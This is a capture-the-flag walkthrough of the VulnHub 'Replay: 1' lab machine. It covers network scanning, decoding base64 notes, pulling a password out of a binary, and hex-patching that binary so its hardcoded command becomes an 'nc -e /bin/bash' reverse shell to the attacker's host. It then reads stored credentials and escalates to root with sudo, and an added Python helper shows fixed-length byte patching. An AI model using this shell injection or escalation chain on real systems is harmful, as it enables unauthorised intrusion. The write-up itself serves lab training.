Replay
Author: jason huawen
Target information
Name: Replay: 1
URL:
https://www.vulnhub.com/entry/replay-1,278/
Identifying the target host IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:c9:15:8b 1 60 PCS Systemtechnik GmbH
192.168.56.102 08:00:27:a0:d5:27 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool on Kali Linux, the target host IP address is identified as 192.168.56.102.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.102 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-15 21:30 EDT
Nmap scan report for bogon (192.168.56.102)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 54:35:aa:49:eb:90:09:a1:28:f3:0c:9a:fb:01:52:0d (RSA)
| 256 e7:0b:6e:52:00:51:74:11:b6:cd:c6:cf:25:3a:1b:84 (ECDSA)
|_ 256 3b:38:da:d7:16:23:64:68:8f:52:12:8a:14:07:6a:53 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/bob_bd.zip
|_http-server-header: Apache/2.4.25 (Debian)
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GetRequest, Kerberos, LPDString, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe:
| CH1:
| Auth Failed Closing Connection... =-
| DNSVersionBindReqTCP, HTTPOptions, SSLSessionReq, TLSSessionReq:
| CH1:
| Auth Failed Closing Connection... =-
| Auth Failed Closing Connection... =-
| GenericLines, NULL:
| CH1:
| Help, RPCCheck:
| Auth Failed Closing Connection... =-
| CH1:
|_ Auth Failed Closing Connection... =-
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:A0:D5:27 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.14 seconds
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ telnet 192.168.56.102 1337
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.
CH1:
hello
exit
^C
quit
zsh: terminated telnet 192.168.56.102 1337
It is not clear what service is running on port 1337.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ curl http://192.168.56.102
<!-- P1:qGQjwO4h6g -->
<style>
body{
background-color: coral;
}
@font-face{
font-family: "cool";
src: url('/files/cool.ttf')
}
body{
font-family: cool;
}
.color_txt{
color:purple;
}
.color_title{
color:pink
}
</style>
<body>
<span class="color_title">
<h1>
<img src="/media/welcome.gif"></img>
Bob's Website
</h1>
</span>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gif"></img>
<img src="/media/bob.png"></img>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gi"></img>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<br>
<span class="color_txt">
<p>
This is my website that I made by myself. I have several years of experience managing and creating IT systems. If you are interested in hiring
me you can find <a href="/files/CV.odt"> my CV here.</a> If after reading my CV you are still interested in hiring me then you can contact me
on my email: [email protected]
</p>
</span>
<img src="/files/myITTeam.png"> </img>
</body>
Visiting port 80, the returned page contains an HTML comment: P1:qGQjwO4h6g. Is this a password?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ nikto -h http://192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.102
+ Target Hostname: 192.168.56.102
+ Target Port: 80
+ Start Time: 2023-03-15 21:38:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/bob_bd.zip' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: 430, size: 57c5a1a9d26e8, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-03-15 21:39:03 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ls -alh
total 92K
drwxr-xr-x 2 kali kali 4.0K Mar 15 21:39 .
drwxr-xr-x 78 kali kali 4.0K Mar 15 21:28 ..
-rw-r--r-- 1 kali kali 63K Mar 15 21:39 bob_bd.zip
-rw-r--r-- 1 kali kali 13K Mar 15 21:35 CV.odt
-rw-r--r-- 1 root root 4.0K Mar 15 21:33 nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ unzip bob_bd.zip
Archive: bob_bd.zip
inflating: changelog.txt
inflating: client.bin
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ls -alh
total 256K
drwxr-xr-x 2 kali kali 4.0K Mar 15 21:39 .
drwxr-xr-x 78 kali kali 4.0K Mar 15 21:28 ..
-rw-r--r-- 1 kali kali 63K Mar 15 21:39 bob_bd.zip
-rwxr-xr-x 1 kali kali 1.2K Dec 6 2018 changelog.txt
-rwxr-xr-x 1 kali kali 158K Dec 6 2018 client.bin
-rw-r--r-- 1 kali kali 13K Mar 15 21:35 CV.odt
-rw-r--r-- 1 root root 4.0K Mar 15 21:33 nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ cat changelog.txt
Changelog:
RG9uJ3QgZm9yZ2V0CgpQClMtPkItPkMtPkQtPlMKQy0+Qi0+UwpDLT5FLT5T
Next Update:
+ Add ASCII art
+ Fix bug where sometimes the backdoor fails to connect (fixed by reopening client.bin)
+ Add ablilty to be able to send more than hardcoded commands again (removed because of beefing up of security)
V4 [*clink* *clink* You will never be able to penetrate my defenses!]:
+ Backdoor will execute any command, too bad it only sends one hardcoded command :P (gonna have to add an input onto client)
+ Security beefed up bet no one can get through this, XOR and b64 is king
RW5kIG9mIGxvZw==
V3 [All wrapped up in a neat bow]:
+ Added a cool security challenge system to stop hackers
+ I am now compiling the python file into .bins
+ Added b64 system to improve security
Ti5ULlMgQWRkZWQgMm5kIGhhbGYgb2YgcGFzc3dvcmQgaW50byB0aGUgYmFja2Rvb3Igc28gaWYgeW91IGZvcmdldCB0aGF0J3Mgd2hlcmUgaXQgaXMgZnVydHVyZSBtZS4gRW5kIG9mIGxvZw==
V2 [The no go zone]:
+ Added b64 support
+ Added password check (validated by server)
RW5kIG9mIGxvZw==
V1 [And then there was light]:
+ I made a backdoor :D
+ Now I can access my server from anywhere without using ssh
RW5kIG9mIGxvZw==
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ echo 'RW5kIG9mIGxvZw==' | base64 -d
End of log
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ echo 'Ti5ULlMgQWRkZWQgMm5kIGhhbGYgb2YgcGFzc3dvcmQgaW50byB0aGUgYmFja2Rvb3Igc28gaWYgeW91IGZvcmdldCB0aGF0J3Mgd2hlcmUgaXQgaXMgZnVydHVyZSBtZS4gRW5kIG9mIGxvZw==' | base64 -d
N.T.S Added 2nd half of password into the backdoor so if you forget that's where it is furture me. End of log
Running client.bin shows that it asks for a password.
strings client.bin
home/c0rruptedb1t/MEGA/Projects And Operations/Project Replay/scripts/client.pydataIP: outputAF_INETEnter Password: sendmsgkeyencodexornotes00admincmd;echo Hello World, you are currently running as: ;whoamidecodestring--=======NOTES=======-- +Buy new milk (the current one is chunky) +2nd half of password is: h0TAIRNXuQcDu9Lqsyul +Find a new job +Call mom =====[END]=====commandlettersrecvoschoicesystem-= TERMINATING CONNNECTION =-
client_socketrandominputstrclearraw_inputCommand to be executed: replacejointimebase64
?exit1230012300admincmd;SOCK_STREAMconnectsleepoutdataappendXORtmpAttempting to connect...(
Definitely the password I swear -> password123 <- Definitely the password I sweartypesbye<module>encodestringnumsHello there you're not being naughty are you? bob_pass123456789rblensumiterlongnameopenreadreprsitelevelrangeformatlocalsxrange__all____cmp____doc__compileglobalsinspect__dict____exit____file____iter____main____name____path__exc_typefromlist__class____enter__bytearrayexc_value__import____module____delattr____getattr____package____setattr__classmethod__builtins__staticmethod__metaclass__exc_traceback/usr/bin/python2
GCC: (Debian 8.2.0-6) 8.2.0
From this we learn that the second half of the password is: h0TAIRNXuQcDu9Lqsyul
The string found earlier in the web page source, qGQjwO4h6g, is probably the first half of the password.
So the full password is qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul
Running client.bin
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ./client.bin
./client.bin: error while loading shared libraries: libpython2.7.so.1.0: cannot open shared object file: No such file or directory
Execution fails because a shared library is missing; installing the corresponding library package fixes it:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo apt install libpython2.7
echo Hello World, you are currently running as: ;whoamidecodestring--
It seems client.bin contains a hardcoded command that runs whoami. Can client.bin be modified with vim to get a shell instead?
- xxd client.bin client.bin.dump
- Edit client.bin.dump with vim -b, changing the "echo Hello World, ...." part to "echo Hello.... nc -e /bin/bash 192.168.56.146 5555". The length must stay exactly the same; edit only the hex column (the text column does not need changing). CyberChef can be used to obtain the hex of the original data and of the replacement.
- xxd -r client.bin.dump >client.bin
echo Hello World, you are currently running as: ;whoami
The corresponding hex bytes are:
65 63 68 6f 20 48 65 6c 6c 6f 20 57 6f 72 6c 64 2c 20 79 6f 75 20 61 72 65 20 63 75 72 72 65 6e 74 6c 79 20 72 75 6e 6e 69 6e 67 20 61 73 3a 20 3b 77 68 6f 61 6d 69
Changed to:
echo Hello Worldddd;nc -e /bin/bash 192.168.56.146 5555
The corresponding hex bytes are:
65 63 68 6f 20 48 65 6c 6c 6f 20 57 6f 72 6c 64 64 64 64 3b 6e 63 20 2d 65 20 2f 62 69 6e 2f 62 61 73 68 20 31 39 32 2e 31 36 38 2e 35 36 2e 31 34 36 20 35 35 35 35
Note that the bytes must be changed one at a time, and the total length must be identical before and after the change.
Running the modified client.bin yields a shell:
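The xxd / vim -b / xxd -r step above is a fixed-length byte patch: the replacement must occupy exactly the same bytes so that nothing after it in the binary shifts. As an added example that is not part of the original write-up, the following Python script performs the same swap with the checks a careful operator would want (identical length, exactly one occurrence, output written to a new file rather than in place) and prints the hex of both strings the way the write-up lists them. The sample binary contents, OLD_CMD, NEW_CMD and the file names are constructed stand-ins; the replacement here is a harmless command of the same length.

```python
"""Fixed-length patch of a hardcoded string inside a binary (added example)."""
import os


def hexline(b: bytes) -> str:
    """Render bytes as the space-separated hex the write-up shows."""
    return " ".join(f"{x:02x}" for x in b)


def patch_fixed_length(data: bytes, old: bytes, new: bytes) -> tuple[bytes, int]:
    """Return (patched_data, offset) with old swapped for new, same length only.

    A longer or shorter replacement would move every byte that follows it,
    which is exactly what the manual hex edit above has to avoid.
    """
    if len(old) != len(new):
        raise ValueError(f"length mismatch: {len(old)} vs {len(new)} bytes")
    offset = data.find(old)
    if offset < 0:
        raise ValueError("original string not found in data")
    if data.find(old, offset + 1) >= 0:
        raise ValueError("original string occurs more than once; refusing to guess")
    patched = data[:offset] + new + data[offset + len(old):]
    return patched, offset


def patch_file(src: str, dst: str, old: bytes, new: bytes) -> int:
    """Read src, write the patched copy to dst (never in place), return offset."""
    with open(src, "rb") as f:
        data = f.read()
    patched, offset = patch_fixed_length(data, old, new)
    with open(dst, "wb") as f:
        f.write(patched)
    os.chmod(dst, 0o755)  # keep the copy executable like the original
    return offset


# Constructed stand-in for client.bin: a few bytes around the hardcoded command.
OLD_CMD = b"echo Hello World, you are currently running as: ;whoami"
NEW_CMD = b"echo Hello World, you are currently running as: ;id;pwd"  # also 55 bytes
SAMPLE_BIN = b"\x7fELF\x00\x01Enter Password: \x00" + OLD_CMD + b"\x00decodestring"

if __name__ == "__main__":
    print("old:", hexline(OLD_CMD))
    print("new:", hexline(NEW_CMD))
    patched, off = patch_fixed_length(SAMPLE_BIN, OLD_CMD, NEW_CMD)
    print(f"patched {len(OLD_CMD)} bytes at offset {off}")
```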
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.102] 58350
id
uid=1000(bob) gid=1000(bob) groups=1000(bob),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),115(lpadmin),119(scanner)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash: fortune: command not found
bash: cowsay: command not found
bash: lolcat: command not found
bob@replay:/root$ cd /home
cd /home
bob@replay:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Dec 6 2018 .
drwxr-xr-x 22 root root 4.0K Dec 6 2018 ..
drwxr-xr-x 19 bob bob 4.0K Dec 6 2018 bob
bob@replay:/home$ cd bob
cd bob
bob@replay:~$ ls -alh
ls -alh
bob@replay:~/Documents$ cd .ftp
cd .ftp
bob@replay:~/Documents/.ftp$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 bob bob 4.0K Dec 6 2018 .
drwxr-xr-x 4 bob bob 4.0K Dec 6 2018 ..
-rw-r--r-- 1 bob bob 49 Dec 6 2018 users.passwd
bob@replay:~/Documents/.ftp$ cat users.passwd
cat users.passwd
bob:b0bcat_1234567890:1100:1100::/ftp:/bin/false
bob@replay:~/Documents/.ftp$ sudo -l
sudo -l
[sudo] password for bob: b0bcat_1234567890
Matching Defaults entries for bob on replay:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on replay:
(ALL : ALL) ALL
bob@replay:~/Documents/.ftp$ sudo /bin/bash
sudo /bin/bash
root@replay:/home/bob/Documents/.ftp# cd /root
cd /root
root@replay:~# ls -alh
ls -alh
total 32K
drwx------ 3 root root 4.0K Dec 6 2018 .
drwxr-xr-x 22 root root 4.0K Dec 6 2018 ..
-rw------- 1 root root 5.1K Dec 6 2018 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 root root 4.0K Dec 6 2018 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Dec 6 2018 .selected_editor
root@replay:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@replay:~#
From: https://www.cnblogs.com/jason-huawen/p/17221695.html